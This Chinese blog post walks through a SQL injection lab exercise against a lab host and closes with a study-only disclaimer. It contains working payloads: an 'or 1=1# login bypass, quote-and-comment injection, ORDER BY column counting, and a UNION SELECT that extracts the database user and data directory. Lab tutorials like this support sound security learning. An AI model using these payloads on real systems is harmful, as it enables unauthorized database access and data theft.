SQL注入之注入原理

Posted 星球守护者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入之注入原理相关的知识,希望对你有一定的参考价值。

注入原理-基础实验

实验内容


1、访问172.16.12.2

2、万能密码登录 'or 1=1#

3、登陆后有两个注入实验,进行手工注入

实验一:字符型注入

使用hackbar输入?id=1’,查看报错回显,提示多了个分号 ’

所以payload就可以这么写,用%23将后面内注释掉即可

Payload:

http://172.16.12.2/string.php?id=1'%23 

5、成功

实验二:联合注入

使用hackbar输入 ?id=1’,查看报错回显,提示多了个分号 ’

将分号 '去除,成功 Payload:

http://172.16.12.2/number.php?id=1%23 发现页面正常


7、判断列数 Payload:

http://172.16.12.2/number.php?id=1 order by 3 %23 页面没有报错
http://172.16.12.2/number.php?id=1 order by 4 %23 页面报错


8、使用联合查询语句,查询信息 Payload:

?id=-1 union select 1,current_user(),@@datadir #

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

以上是关于SQL注入之注入原理的主要内容,如果未能解决你的问题,请参考以下文章

sql注入之常见注入类型

安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段

网络安全从入门到放弃之SQL注入基本原理

Java代码审计连载之—SQL注入

SQL注入原理及代码分析

试解释 SQL 注入攻击的原理,以及对数据库可能产生的不利影响。